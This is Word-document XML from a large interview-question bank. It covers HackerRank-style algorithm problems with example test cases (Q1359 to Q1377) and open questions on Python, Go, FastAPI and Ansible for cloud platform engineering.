        </w:rPr>
        <w:t>Q1359. HackerRank strings - special palindrome: Count substrings whose characters are all identical, or identical except for one different middle character. Design a solution faster than checking every substring. Test cases: 'asasd' -&gt; 7; 'aaaa' -&gt; 10; 'abcbaba' -&gt; 10.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strings - special palindrome: Count substrings whose characters are all identical, or identical except for one different middle character. Design a solution faster than checking every substring. Test cases: 'asasd' -&gt; 7; 'aaaa' -&gt; 10; 'abcbaba' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1360. HackerRank frequency queries: Process insert x, delete one occurrence of x, and check whether any value occurs exactly f times. Each operation should run in average O(1) time. Test case: [[1,5],[1,6],[3,2],[1,5],[1,5],[1,6],[2,5],[3,2]] -&gt; [0,1]. Deleting a missing value must not fail.</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frequency queries: Process insert x, delete one occurrence of x, and check whether any value occurs exactly f times. Each operation should run in average O(1) time. Test case: [[1,5],[1,6],[3,2],[1,5],[1,5],[1,6],[2,5],[3,2]] -&gt; [0,1]. Deleting a missing value must not fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1361. HackerRank greedy - luck balance: Each contest has a luck value and importance flag. You may lose at most k important contests. Return maximum achievable luck and justify the greedy choice. Test cases: k=3, contests=[[5,1],[2,1],[1,1],[8,1],[10,0],[5,0]] -&gt; 29; k=0, [[5,1],[10,0]] -&gt; 5.</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greedy - luck balance: Each contest has a luck value and importance flag. You may lose at most k important contests. Return maximum achievable luck and justify the greedy choice. Test cases: k=3, contests=[[5,1],[2,1],[1,1],[8,1],[10,0],[5,0]] -&gt; 29; k=0, [[5,1],[10,0]] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1362. HackerRank sorting - fraudulent activity notifications: Given expenditures and trailing window d, count days where today's value is at least twice the median of the previous d days. Avoid sorting the full window each day. Test cases: [2,3,4,2,3,6,8,4,5], d=5 -&gt; 2; [1,2,3,4,4], d=4 -&gt;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sorting - fraudulent activity notifications: Given expenditures and trailing window d, count days where today's value is at least twice the median of the previous d days. Avoid sorting the full window each day. Test cases: [2,3,4,2,3,6,8,4,5], d=5 -&gt; 2; [1,2,3,4,4], d=4 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1363. HackerRank stack - largest rectangle: Given histogram heights, return the largest rectangular area from consecutive bars using an O(n) monotonic stack. Test cases: [1,2,3,4,5] -&gt; 9; [2,1,5,6,2,3] -&gt; 10; [] -&gt; 0; [5] -&gt; 5.</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stack - largest rectangle: Given histogram heights, return the largest rectangular area from consecutive bars using an O(n) monotonic stack. Test cases: [1,2,3,4,5] -&gt; 9; [2,1,5,6,2,3] -&gt; 10; [] -&gt; 0; [5] -&gt; 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1364. HackerRank stack - balanced brackets with errors: Validate nested (), [], and {} and return the zero-based index of the first invalid character, or -1 when valid. If opening brackets remain, return the index of the earliest unmatched opener. Test cases: '{[()]}' -&gt; -1; '{[(])}' -&gt; 3; '(()' -&gt; 0; ']'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stack - balanced brackets with errors: Validate nested (), [], and {} and return the zero-based index of the first invalid character, or -1 when valid. If opening brackets remain, return the index of the earliest unmatched opener. Test cases: '{[()]}' -&gt; -1; '{[(])}' -&gt; 3; '(()' -&gt; 0; ']' -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1365. HackerRank queue - castle on the grid: Given a square grid with open and blocked cells, find minimum rook-like moves from start to goal. Test case: grid=['.X.','.X.','...'], start=(0,0), goal=(0,2) -&gt; 3. Also test start=goal -&gt; 0 and an unreachable goal -&gt; -1.</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queue - castle on the grid: Given a square grid with open and blocked cells, find minimum rook-like moves from start to goal. Test case: grid=['.X.','.X.','...'], start=(0,0), goal=(0,2) -&gt; 3. Also test start=goal -&gt; 0 and an unreachable goal -&gt; -1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1366. HackerRank heap - running median: For a stream of integers, output the median after every insertion using two heaps and state their invariants. Test cases: [12,4,5,3,8,7] -&gt; [12.0,8.0,5.0,4.5,5.0,6.0]; [-1,-2] -&gt; [-1.0,-1.5].</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heap - running median: For a stream of integers, output the median after every insertion using two heaps and state their invariants. Test cases: [12,4,5,3,8,7] -&gt; [12.0,8.0,5.0,4.5,5.0,6.0]; [-1,-2] -&gt; [-1.0,-1.5].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1367. HackerRank intervals - minimum meeting rooms: Given [start,end) intervals, return minimum rooms required in O(n log n); an ending meeting frees its room before another starts at that time. Test cases: [[0,30],[5,10],[15,20]] -&gt; 2; [[7,10],[10,12]] -&gt; 1; []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intervals - minimum meeting rooms: Given [start,end) intervals, return minimum rooms required in O(n log n); an ending meeting frees its room before another starts at that time. Test cases: [[0,30],[5,10],[15,20]] -&gt; 2; [[7,10],[10,12]] -&gt; 1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1368. HackerRank linked lists - cycle entry: Return the node where a singly linked-list cycle begins or None, using O(1) space, and prove Floyd's method. Test cases: 3-&gt;2-&gt;0-&gt;-4 with tail pointing to node 2 -&gt; node 2; 1-&gt;2 with tail pointing to head -&gt; node 1; 1-&gt;2-&gt;None -&gt; None.</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linked lists - cycle entry: Return the node where a singly linked-list cycle begins or None, using O(1) space, and prove Floyd's method. Test cases: 3-&gt;2-&gt;0-&gt;-4 with tail pointing to node 2 -&gt; node 2; 1-&gt;2 with tail pointing to head -&gt; node 1; 1-&gt;2-&gt;None -&gt; None.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1369. HackerRank trees - lowest common ancestor: Given a binary tree and two nodes, return their LCA; explain the change when either node may be absent. Test tree [3,5,1,6,2,0,8,null,null,7,4]: LCA(5,1) -&gt; 3; LCA(5,4) -&gt; 5; missing node -&gt; None in the presence-check version.</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trees - lowest common ancestor: Given a binary tree and two nodes, return their LCA; explain the change when either node may be absent. Test tree [3,5,1,6,2,0,8,null,null,7,4]: LCA(5,1) -&gt; 3; LCA(5,4) -&gt; 5; missing node -&gt; None in the presence-check version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1370. HackerRank binary search - machine production: Machines take different days per item. Given a goal, return minimum production days by binary-searching the answer. Test cases: machines=[2,3,2], goal=10 -&gt; 8; [1,3,4], goal=10 -&gt; 7; [5], goal=0 -&gt;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binary search - machine production: Machines take different days per item. Given a goal, return minimum production days by binary-searching the answer. Test cases: machines=[2,3,2], goal=10 -&gt; 8; [1,3,4], goal=10 -&gt; 7; [5], goal=0 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1371. HackerRank graphs - shortest reach: Given an unweighted graph and start node, return distances to all other nodes using edge weight 6 and -1 when unreachable. Test case: n=4, edges=[(1,2),(1,3)], start=1 -&gt; [6,6,-1] for nodes [2,3,4]. Also test a graph with no edges.</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graphs - shortest reach: Given an unweighted graph and start node, return distances to all other nodes using edge weight 6 and -1 when unreachable. Test case: n=4, edges=[(1,2),(1,3)], start=1 -&gt; [6,6,-1] for nodes [2,3,4]. Also test a graph with no edges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1372. HackerRank graphs - roads and libraries: Find minimum cost to give n cities library access using libraries and undirected roads; handle disconnected components. Test cases: n=3, library=2, road=1, edges=[(1,2),(3,1),(2,3)] -&gt; 4; n=6, library=2, road=5, any edges -&gt; 12.</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graphs - roads and libraries: Find minimum cost to give n cities library access using libraries and undirected roads; handle disconnected components. Test cases: n=3, library=2, road=1, edges=[(1,2),(3,1),(2,3)] -&gt; 4; n=6, library=2, road=5, any edges -&gt; 12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1373. HackerRank dynamic programming - max subset sum: Return maximum sum of non-adjacent elements. Define empty input as 0 and require choosing an element for non-empty all-negative input. Test cases: [3,7,4,6,5] -&gt; 13; [2,1,5,8,4] -&gt; 11; [-2,-3,-1] -&gt; -1; []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dynamic programming - max subset sum: Return maximum sum of non-adjacent elements. Define empty input as 0 and require choosing an element for non-empty all-negative input. Test cases: [3,7,4,6,5] -&gt; 13; [2,1,5,8,4] -&gt; 11; [-2,-3,-1] -&gt; -1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1374. HackerRank dynamic programming - abbreviation: Can string a become b by deleting lowercase letters and optionally capitalizing lowercase letters, while uppercase letters cannot be deleted? Test cases: ('daBcd','ABC') -&gt; True; ('AbcDE','ABDE') -&gt; True; ('AbcDE','AFDE') -&gt; False.</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dynamic programming - abbreviation: Can string a become b by deleting lowercase letters and optionally capitalizing lowercase letters, while uppercase letters cannot be deleted? Test cases: ('daBcd','ABC') -&gt; True; ('AbcDE','ABDE') -&gt; True; ('AbcDE','AFDE') -&gt; False.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1375. HackerRank practical coding - log sessionization: Group unsorted (user_id,timestamp,action) records into sessions where consecutive events are at most 30 minutes apart. Test: u1 events at 10:00, 10:30, 11:01 produce two sessions; events exactly 30 minutes apart stay together; empty input -&gt; [].</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practical coding - log sessionization: Group unsorted (user_id,timestamp,action) records into sessions where consecutive events are at most 30 minutes apart. Test: u1 events at 10:00, 10:30, 11:01 produce two sessions; events exactly 30 minutes apart stay together; empty input -&gt; [].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1376. HackerRank practical coding - API dependency order: Given services and dependencies where A depends on B, return a valid deployment order or report a cycle, including isolated services. Test cases: services=[api,db,cache], dependencies=[(api,db)] -&gt; db before api with cache anywhere; [(a,b),(b,a)] -&gt; cycle error.</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practical coding - API dependency order: Given services and dependencies where A depends on B, return a valid deployment order or report a cycle, including isolated services. Test cases: services=[api,db,cache], dependencies=[(api,db)] -&gt; db before api with cache anywhere; [(a,b),(b,a)] -&gt; cycle error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1377. HackerRank practical coding - sliding-window rate limiter: Given chronological timestamped requests by user, return rejected indices when each user may make at most k requests in any rolling 60-second window. Test: k=2, requests=[(u1,0),(u1,10),(u1,20),(u2,20),(u1,60),(u1,71)] -&gt; [2]; requests exactly 60 seconds apart are outside the same window.</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practical coding - sliding-window rate limiter: Given chronological timestamped requests by user, return rejected indices when each user may make at most k requests in any rolling 60-second window. Test: k=2, requests=[(u1,0),(u1,10),(u1,20),(u2,20),(u1,60),(u1,71)] -&gt; [2]; requests exactly 60 seconds apart are outside the same window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Debug This Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1378.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1379.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1380.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1381.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1382.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1383.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1384.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1385.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1386.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1387.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1388.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1389.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1390.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1391.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1392. Python automation: How would you use the Kubernetes Python client to find CrashLoopBackOff, ImagePullBackOff, Pending, and high-restart pods across namespaces?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1393. Python error handling: How would you design retries, exponential backoff, timeouts, and idempotency for a Python cloud API automation tool?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1394. Python logging: How would you implement structured logging, correlation IDs, and metrics in a Python operational tool?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1395. Python data parsing: How would you parse large JSON, YAML, CSV, or log files safely and produce an incident summary?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1396. Python packaging: How would you package, version, document, and release an internal Python CLI used by platform teams?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1397. Python security: How would you prevent secrets from leaking through environment variables, logs, stack traces, process arguments, or CI output?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1398. Python code review: What would you check in a Python automation PR before allowing it to run against production infrastructure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1399. Python interview coding: Write the approach for a function that calculates SLO compliance and remaining error budget from request totals and failures.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1400. Python type hints: How would you use type hints, dataclasses, and mypy to make a platform automation codebase safer and easier to review?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1401. Python decorators: How would you write a decorator that adds retries, timing, and structured logging to any cloud automation function?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1402. Python context managers: How would you implement a context manager that acquires a distributed lock before running a destructive infrastructure operation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1403. Python CLI design: How would you design a Python CLI with argparse or Click that supports dry-run, environment selection, and confirmation prompts for risky actions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1404. Python GCP client patterns: How would you handle pagination, quota errors, and exponential backoff when listing thousands of resources with GCP client libraries?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1405. Python dependency management: How would you manage dependencies, lockfiles, and reproducible builds for an internal Python tool using pip-tools or Poetry?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1406. Python performance: A Python automation script that inventories thousands of GCP resources is too slow. How would you profile it and decide between async, threads, or multiprocessing?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1407. Python mocking: How would you mock GCP and Kubernetes API responses in pytest to test error handling paths like throttling, timeouts, and permission denials?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1408. Scripting experience: Do you have hands-on scripting experience? Which languages do you use most, and why?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1409. Python vs Bash: What is the difference between Python and Bash scripting, and when would you choose one over the other?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1410. Task automation approach: How do you decide what to automate, and how do you approach automating a repetitive manual task?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1411. Python CPU monitor: Write a Python script that monitors and prints current CPU utilization at a regular interval.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1412. Go error handling: How does Go error handling work, and how would you structure errors in a production CLI or service?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1413. Go HTTP service: How would you build a small Go HTTP service for health checks, metrics, and safe operational actions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1414. Go CLI design: How would you design a Go CLI with Cobra to audit Kubernetes or GCP resources across environments?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1415. Go operator: A team wants an operator to manage namespace onboarding with RBAC, quotas, and network policies. How would you approach it in Go?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1416. Go interfaces: How do interfaces help with testing cloud clients, Kubernetes clients, and business logic in Go?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1417. Go testing: How would you write unit tests, table-driven tests, mocks, and integration tests for a Go platform tool?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1418. Go modules: How do Go modules, semantic versioning, dependency updates, and vulnerability scanning fit into enterprise engineering?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1419. Go observability: How would you add structured logs, Prometheus metrics, traces, and graceful shutdown to a Go service?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1420. Go generics: How would generics help when writing reusable Kubernetes resource helpers, and where would you avoid using them?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1421. Go context propagation: How would you propagate deadlines, cancellation, and request-scoped values across a Go service calling multiple downstream APIs?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1422. Go gRPC: When would you choose gRPC over REST for a platform service, and what would you consider for versioning, streaming, and error handling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1423. Go worker pools: How would you design a bounded worker pool in Go to process a large batch of cloud resources while preserving per-item errors?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1424. Go profiling: A Go service has unexpected memory growth. How would you use pprof to find the leak and confirm the fix?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1425. Go configuration: How would you manage configuration and secrets for a Go service across local, staging, and production without hardcoding values?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1426. Go container builds: How would you build small, reproducible, multi-arch Docker images for a Go binary in CI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1427. Go CRDs: How would you design a Custom Resource Definition and reconciliation loop for a Kubernetes operator that manages namespace onboarding?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1428. FastAPI dependency injection: How would you use dependencies for authentication, database sessions, request context, and reusable validation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1429. FastAPI database design: How would you manage database connections, migrations, transactions, pooling, and retries in a FastAPI app?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1430. FastAPI background work: When would you use BackgroundTasks, Pub/Sub, Celery, Cloud Tasks, or a separate worker instead of doing work in the request path?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1431. FastAPI testing: How would you test endpoints, dependencies, authentication, database behavior, and error paths using pytest and TestClient?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1432. FastAPI rate limiting: How would you implement rate limiting and request throttling per client for a FastAPI service shared by multiple internal teams?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1433. FastAPI error handling: How would you design exception handlers and error response schemas so clients get consistent, actionable error payloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1434. FastAPI versioning: How would you version a FastAPI API without breaking existing consumers, and when would you deprecate an old version?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1435. FastAPI caching: How would you add caching with Redis or Memorystore to a FastAPI endpoint, and how would you handle cache invalidation correctly?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1436. FastAPI WebSockets: When would you use WebSockets instead of polling or Server-Sent Events in a FastAPI service, and what operational risks come with it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1437. FastAPI multi-tenant design: How would you design request-scoped tenant isolation, quotas, and data access boundaries in a shared FastAPI service?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1438. FastAPI API gateway: How would you deploy FastAPI behind an API gateway or load balancer on GCP, including auth, TLS termination, and request tracing?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1439. FastAPI contract-first design: How would you design an OpenAPI-first FastAPI service so the schema, docs, and client SDKs stay in sync?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1440. Ansible inventory: How would you structure dynamic inventory for GCP, AWS, and Azure instances instead of maintaining a static inventory file?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
